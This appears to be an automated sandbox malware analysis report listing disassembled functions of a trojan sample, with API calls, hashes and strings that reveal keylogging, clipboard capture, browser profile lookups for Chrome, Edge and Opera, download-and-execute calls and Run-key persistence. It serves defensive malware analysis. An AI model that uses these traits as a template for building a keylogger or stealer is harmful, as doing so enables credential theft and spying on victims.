                                    • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                    Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                    Download Yara Rule
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                    • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                    • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                    • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                    Function 00449E3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
                                    • GetLastError.KERNEL32 ref: 00449F2B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide
                                    • String ID: PkGNG
                                    • API String ID: 203985260-263838557
                                    • Opcode ID: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                                    • Instruction ID: 5218313022fb824330162c1b3e1e252a07855a0508c927524b2412b0d5c8e50b
                                    • Opcode Fuzzy Hash: 8762d6c9eb8cd6bb849928aa97b0b7335ecf1b8cbe6ccd937ce160abea437523
                                    • Instruction Fuzzy Hash: A531F831600205EBEB21EF56C845BAB77A8DF55711F24416BF9048B3D1DB38CD41E7A9
                                    Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • __Init_thread_footer.LIBCMT ref: 0040B797
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                    • API String ID: 1881088180-3686566968
                                    • Opcode ID: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                                    • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                    • Opcode Fuzzy Hash: 60402113f4b18a007ad5d9fa0adee8409e9b11ca3b01e04d5642538178529adf
                                    • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                    Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetACP.KERNEL32(?,20001004,?,00000002), ref: 00451C12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ACP$OCP
                                    • API String ID: 0-711371036
                                    • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                    • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                    • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                    • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                    Function 0044B731 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                                    • GetLastError.KERNEL32 ref: 0044B804
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFileLastWrite
                                    • String ID: PkGNG
                                    • API String ID: 442123175-263838557
                                    • Opcode ID: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                    • Instruction ID: 56933c973e2243a1a9a6e47b5ff38ff3048756f5123006952a384074424e161b
                                    • Opcode Fuzzy Hash: e2af8d231f6539d56f2593d6ace3ed0d4bab48f660b2d85d051dab4aa689f9d2
                                    • Instruction Fuzzy Hash: 12319331A00619DBCB24CF59CD809DAB3F9EF88311F1445AAE509D7361D734ED81CB68
                                    Function 0044B652 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                                    • GetLastError.KERNEL32 ref: 0044B716
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFileLastWrite
                                    • String ID: PkGNG
                                    • API String ID: 442123175-263838557
                                    • Opcode ID: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                    • Instruction ID: 12ef57d8ab414bd2a6c5914f5c8b73f84ca543b1ee1fc2f1adbb6bb6aefc8993
                                    • Opcode Fuzzy Hash: 51546446b41bf805027a94335c0e64e4fe702750584376849c5da3291fd64da6
                                    • Instruction Fuzzy Hash: 6C21B435600219DFCB14CF69C980BE9B3F8EB48302F1044AAE94AD7351D734ED81CB64
                                    Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                    Strings
                                    • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: KeepAlive | Enabled | Timeout:
                                    • API String ID: 481472006-1507639952
                                    • Opcode ID: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                                    • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                    • Opcode Fuzzy Hash: 2607bdc9f0d933924e59b09d9b4d17e10e2c88dcc52cf24d6e3d3c5d02c0a6dc
                                    • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                    Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32 ref: 00416640
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DownloadFileSleep
                                    • String ID: !D@
                                    • API String ID: 1931167962-604454484
                                    • Opcode ID: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                                    • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                    • Opcode Fuzzy Hash: 1ee2299181c43429df041adb64fff50d3160e985c7a9a19c3789c6205816a6ff
                                    • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                    Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                    Download Yara Rule
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: alarm.wav$hYG
                                    • API String ID: 1174141254-2782910960
                                    • Opcode ID: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                                    • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                    • Opcode Fuzzy Hash: a80849807d39b6d885b850496f76bbee22079f6d4cd25328039c8df50d7c6aa3
                                    • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                    Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                    • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                    • String ID: Online Keylogger Stopped
                                    • API String ID: 1623830855-1496645233
                                    • Opcode ID: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                                    • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                    • Opcode Fuzzy Hash: bcbfeeedac202dcce5c27b8ae7271b8f67804fce0d04219dcea429481c7fcc84
                                    • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                    Function 00448BB3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,73E85006,00000001,?,0043CE55), ref: 00448C24
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String
                                    • String ID: LCMapStringEx$PkGNG
                                    • API String ID: 2568140703-1065776982
                                    • Opcode ID: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                                    • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                    • Opcode Fuzzy Hash: 20edb6311ff80fd52f273064eb78c9c2f4c40470f2fa2ad589d6478c135721a4
                                    • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                    Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                    Download Yara Rule
                                    APIs
                                    • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                    • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$BufferHeaderPrepare
                                    • String ID: XMG
                                    • API String ID: 2315374483-813777761
                                    • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                    • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                    • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                    • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                    Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocaleValid
                                    • String ID: IsValidLocaleName$JD
                                    • API String ID: 1901932003-2234456777
                                    • Opcode ID: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                                    • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                    • Opcode Fuzzy Hash: 51bc9a782de688291f39784aabc01e809a53b6defb3ea5057969789d83f50679
                                    • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                    Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                    • API String ID: 1174141254-4188645398
                                    • Opcode ID: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                                    • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                    • Opcode Fuzzy Hash: 333e2781ec0ec89fbd88f6f0735ff55aec90b53b609e1a946a8fd7ce7860d637
                                    • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                    Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                    • API String ID: 1174141254-2800177040
                                    • Opcode ID: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                                    • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                    • Opcode Fuzzy Hash: 46641891947e03d640cd62480cc1169afb97d1bf2d9271bf70253981d5b275da
                                    • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                    Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: AppData$\Opera Software\Opera Stable\
                                    • API String ID: 1174141254-1629609700
                                    • Opcode ID: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                                    • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                    • Opcode Fuzzy Hash: 776327d6e5661bbd5273f74550199b0ae7763d34e3e9ac4bd8830f7a720e7153
                                    • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                    Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyState.USER32(00000011), ref: 0040B64B
                                      • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                      • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                      • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                      • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                      • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                    • String ID: [AltL]$[AltR]
                                    • API String ID: 2738857842-2658077756
                                    • Opcode ID: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                                    • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                    • Opcode Fuzzy Hash: 7258a7f4b132cbc40b361f8d5efa273a6a49595113cd8e0a5555153196a7725b
                                    • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                    Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                    • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: uD
                                    • API String ID: 0-2547262877
                                    • Opcode ID: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                                    • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                    • Opcode Fuzzy Hash: b77d3b663c6aed767531e5de151c2f7480185761a2f62c70c64f4560ad89233a
                                    • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                    Function 00448957 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AAB7), ref: 00448996
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$FileSystem
                                    • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                    • API String ID: 2086374402-949981407
                                    • Opcode ID: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                    • Instruction ID: 0ece642104574987c61f359f6ab52f67772cb5eafdc88f944851b8b866d171c2
                                    • Opcode Fuzzy Hash: e85234dd122f09b0c94e77719a40fbeea2143a0bc5736c6b14345478c49c6815
                                    • Instruction Fuzzy Hash: 55E0E571A41718E7D710AB259C02E7EBB54DB44B02B10027EFC0957382DE285D0496DE
                                    Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: !D@$open
                                    • API String ID: 587946157-1586967515
                                    • Opcode ID: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                                    • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                    • Opcode Fuzzy Hash: a3fafa264baa1d62442d83e0179a885528cd25db469b1c0675910708919d2975
                                    • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                    Function 0045554B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___initconout.LIBCMT ref: 0045555B
                                      • Part of subcall function 00456B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00455560,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000), ref: 00456B30
                                    • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B59D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB19,?), ref: 0045557E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConsoleCreateFileWrite___initconout
                                    • String ID: PkGNG
                                    • API String ID: 3087715906-263838557
                                    • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                    • Instruction ID: e84ccb038854987deafcb7b601af55b429ad8f27f18c1f17be9b2782bd97289a
                                    • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                    • Instruction Fuzzy Hash: 10E02B70500508BBD610CB64DC25EB63319EB003B1F600315FE25C72D1EB34DD44C759
                                    Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyState.USER32(00000012), ref: 0040B6A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: State
                                    • String ID: [CtrlL]$[CtrlR]
                                    • API String ID: 1649606143-2446555240
                                    • Opcode ID: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                                    • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                    • Opcode Fuzzy Hash: 9c7a87a125a36fd6875230b5c06d2f1de547b3d92bb8a42f9d283a23a60e093e
                                    • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                    Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • __Init_thread_footer.LIBCMT ref: 00410F29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: ,kG$0kG
                                    • API String ID: 1881088180-2015055088
                                    • Opcode ID: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                    • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                    • Opcode Fuzzy Hash: b05ab0c9b3baa3f524da702d8fc1cd1898caf97046da089980d037e9e657a158
                                    • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                    Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D4CE,00000000,?,00000000), ref: 00413A31
                                    • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A45
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteOpenValue
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                    • API String ID: 2654517830-1051519024
                                    • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
